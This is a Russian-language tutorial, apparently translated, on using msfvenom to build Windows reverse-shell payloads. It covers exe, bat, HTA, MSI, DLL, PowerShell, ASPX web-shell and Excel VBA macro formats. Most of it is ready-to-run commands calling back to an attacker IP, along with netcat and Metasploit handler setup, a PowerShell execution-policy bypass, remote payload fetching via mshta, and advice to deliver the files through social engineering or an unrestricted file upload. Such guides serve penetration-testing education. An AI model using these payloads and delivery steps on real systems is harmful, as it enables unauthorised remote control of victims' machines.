Гайд по Msfvenom: эксплуатация Windows

Дата: 24.11.2021. Автор: Игорь Б. Категории: Статьи по информационной безопасности
Гайд по Msfvenom: эксплуатация Windows

В этой статье пойдет речь о Msfvenom. Инструмент отлично подходит для создания всех типов полезных нагрузок для платформы Windows.

Введение

Платформы, которые потребуются читателю, для осуществления практических действий:

  • Kali Linux
  • Windows

Msfvenom – это автономный генератор полезных нагрузок Metasploit, который также способен заменить msfpayload и msfencode.

Его синтаксис:

msfvenom -p (payload type) lhost=(Listening's_IP) lport=(Listening_Port) -f (Filetype) > (Output Filename)

Типы полезных нагрузок

Полезная нагрузка – это вредоносный скрипт, который злоумышленник использует для взаимодействия с целевой машиной с целью ее компрометации. Msfvenom поддерживает следующую платформу и формат для создания полезных нагрузок. Формат вывода данных может соответствовать исполняемым файлам, таким как .exe, .php, .dll, или быть представлен в виде однострочного файла.

Есть два основных типа полезных нагрузок.

  • Stager: они обычно идентифицируются слэшем (/), к примеру: «windows/meterpreter/reverse_tcp»;
  • Stageless: используется «_» вместе второго знака «/» в имени полезной нагрузки, к примеру: «windows/meterpreter_reverse_tcp».
Форматы преобразования фреймворкаФорматы исполняемых фреймворковДоступные платформы для фреймворка
bashaspaix
caspxandroid
csharpaspx-exeapple_ios
dwaxis2brocade
dworddllbsd
hexelfbsdi
javaelf-socisco
js_beexefirefox
js_leexe-onlyfreebsd
numexe-servicehardware
perlexe-smallhpux
plhta-pshirix
powershelljarjava
ps1jspjavascript
pyloop-vbsjuniper
pythonmacholinux
rawmsimainframe
rbmsi-nouacmulti
rubyosx-appnetbsd
shpshnetware
vbapplicationpsh-cmdnodejs
vbscriptpsh-netopenbsd
 psh-reflectionosx
 vbaphp
 vba-exepython
 vba-pshr
 vbsruby
 warsolaris
  unifi
  unix
  unknown
  windows

Как уже было сказано выше, эта статья поможет изучить все возможные методы создания различных форматов полезной нагрузки для платформы Windows.

Исполняемая полезная нагрузка (.exe)

  • Тип полезной нагрузки: Stager

Выполнение следующей команды для создания вредоносного exe-файла даст возможность получить исполняемый файл для Microsoft Windows:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f exe > shell.exe

Весь вредоносный код будет записан внутри «shell.exe» файла и выполнен в виде exe-программы на целевой машине.

Гайд по Msfvenom: эксплуатация Windows

Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.

nc –lvp 443
Гайд по Msfvenom: эксплуатация Windows

Пакетный файл Powershell

  • Тип полезной нагрузки: Stager

Пользователь выполнит следующую команду для создания вредоносного пакетного файла (с расширением .bat) для DOS и Windows:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 > shell.bat

Весь вредоносный код будет записан внутри файла «shell.bat» и выполнен в виде bat-скрипта на целевой машине.

Гайд по Msfvenom: эксплуатация Windows

Следует поделиться этим файлом с целью, используя методы социальной инженерии, и дождаться его запуска. Помимо этого, необходимо запустить Netcat в качестве листенера для захвата обратного соединения.

nc –lvp 443
Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка HTML Application (HTA)

  • Тип полезной нагрузки: Stager

HTML-приложение (HTA) – это программа в Microsoft Windows, исходный код которой состоит из HTML, динамического HTML и одного или нескольких языков скриптов, поддерживаемых Internet Explorer, таких как VBScript или JScript.

Пользователь выполнит следующую команду, чтобы создать вредоносный HTA-файл, который используется для DOS и Windows.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

Весь вредоносный код будет записан внутри файла «shell.hta» и выполнен в виде hta-скрипта на целевой машине. Помимо этого, пользователь будет использовать HTTP-сервер Python для обмена файлами.

Гайд по Msfvenom: эксплуатация Windows
mshta http://192.168.1.3/shell.hta

HTA будет выполнен с помощью программы «mshta.exe» или двойным щелчком по файлу.

Гайд по Msfvenom: эксплуатация Windows

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

nc –lvp 443
Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка Microsoft Installer (MSI)

Установщик Windows также известен как установщик Microsoft. Файл MSI –  это пакет Windows, который предоставляет информацию об установке, например, новых программ или инструментов. Его можно использовать для установки обновлений Windows или стороннего программного обеспечения в формате .exe.

Пользователь выполнит следующую команду, чтобы создать вредоносный MSI-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и запустит его.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f msi > shell.msi
Гайд по Msfvenom: эксплуатация Windows

Нужно использовать команду «msiexec» для запуска MSI-файла:

msiexec /quiet /qn /i shell.msi
Гайд по Msfvenom: эксплуатация Windows

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка Dynamic-link library (DLL)

  • Тип полезной нагрузки: Stager

Библиотека DLL – это библиотека, которая содержит код и данные, что могут использоваться несколькими программами.

Пользователь выполнит следующую команду, чтобы создать вредоносный dll-файл, который используется для DOS и Windows. Он перенесет вредоносное ПО в целевую систему и выполнит его.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll
Гайд по Msfvenom: эксплуатация Windows

Следует использовать команду «rundll32» для запуска MSI-файла:

rundll32.exe shell.dll,0
Гайд по Msfvenom: эксплуатация Windows

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка Powershell (psh-cmd)

  • Тип полезной нагрузки: Stager
  • Формат: psh, psh-net, psh-reflection, psh-cmd

Сгенерированные полезные нагрузки в формате «psh», «psh-net» и «psh- reflection» имеют расширение «.ps1», а сгенерированные полезные нагрузки в формате «psh-cmd» получают другое расширение – «.cmd». Помимо этого, пользователь может напрямую выполнить исходный код в командной строке целевой системы.

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.3 lport=443 -f psh-cmd > -f raw

Пользователь выполнит данную команду, чтобы сгенерировать исходный код для вредоносной программы PowerShell.

Гайд по Msfvenom: эксплуатация Windows

Для выполнения следует скопировать сгенерированный код и вставить его в командную строку Windows.

Это приведет к получению обратного соединения через листенер Netcat, который работал в фоновом режиме для его захвата.

Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка Powershell (ps1)

  • Тип полезной нагрузки: Stager

Файл PS1 – это скрипт или «cmdlet», используемый Windows PowerShell. Файлы PS1 похожи на файлы формата «.BAT» и «.CMD», за исключением того, что они выполняются в PowerShell вместо командной строки Windows.

Пользователь выполнит следующую команду, чтобы создать вредоносный сценарий PS1 с расширением имени файла «.PS1», что используется в Windows PowerShell:

msfvenom -p windows/x64/meterpreter_reverse_https lhost=192.168.1.3 lport=443 -f psh > shell.ps1

Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.

Гайд по Msfvenom: эксплуатация Windows

Политика выполнения PowerShell – это функция безопасности, которая управляет условиями, при которых PowerShell загружает файлы конфигурации и запускает скрипты. Данная функция помогает предотвратить выполнение вредоносных скриптов. Она предотвращает запуск всех файлов скриптов, включая файлы форматирования и конфигурации (.ps1xml), файлы скриптов модулей (.psm1) и профили PowerShell (.ps1).

Чтобы выполнить скрипт PS1, необходимо обойти политику выполнения, выполнив следующую команду в Windows PowerShell и запустив то, что нужно:

PowerShell –ep bypass
.\shell.ps1
Гайд по Msfvenom: эксплуатация Windows
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https

Как только цель запустит скрипт «shell.ps1», хакер получит обратное соединение через сеанс meterpreter.

Гайд по Msfvenom: эксплуатация Windows

Полезная нагрузка Web shell (ASPX)

  • Тип полезной нагрузки: Stageless

ASPX-файл – это файл Active Server Page Extended для платформы Microsoft ASP.NET. При просмотре URL-адреса страницы отображаются в веб-браузере пользователя, веб-формы .NET – их другое название.

Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx с соответствующим расширением:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f aspx > shell.aspx

Поскольку тип обратного Shell – meterpreter, необходимо запустить exploit/multi/handler внутри фреймворка Metasploit.

Гайд по Msfvenom: эксплуатация Windows

Пользователь может ввести эту полезную нагрузку для использования уязвимости Unrestricted File Upload, если целью является веб-сервер IIS.

Гайд по Msfvenom: эксплуатация Windows

Пользователь выполняет скрипт загрузки в веб-браузере.

blank
msfconsole
use exploit/multi/handler
set lhost 192.168.1.3
set lport 443
set payload windows/x64/meterpreter_reverse_https

Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterpreter.

Полезная нагрузка Visual Basic (.vba)

  • Тип полезной нагрузки: Stageless

VBA – это расширение файла, обычно ассоциируемое с Visual Basic, что поддерживает приложения Microsoft, такие как Microsoft Excel, Office, PowerPoint, Word и Publisher. Он используется для создания «макросов». что выполняются в Excel. Хакер пользуется привилегиями этих функций и создает вредоносный скрипт VB, который будет выполняться в виде программы макросов с помощью Microsoft Excel.

Пользователь выполнит следующую команду, чтобы создать вредоносный скрипт-aspx, который будет выполняться в виде макросов в Microsoft Excel:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.1.3 lport=443 -f vba
blank

Теперь пользователь открывает его Workbook, в который введены вредоносные макросы.

blank

Как только хакер выполнит вредоносный скрипт, он получит обратное соединение через сеанс meterepreter.

blank

Автор переведённой статьи: Aarti Singh.

Важно! Информация исключительно в учебных целях. Пожалуйста, соблюдайте законодательство и не применяйте данную информацию в незаконных целях.

Игорь Б

Об авторе Игорь Б

Автор на портале cisoclub.ru. Добавляйте ваш материал на сайт в разделе "Разместить публикацию".
Читать все записи автора Игорь Б

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *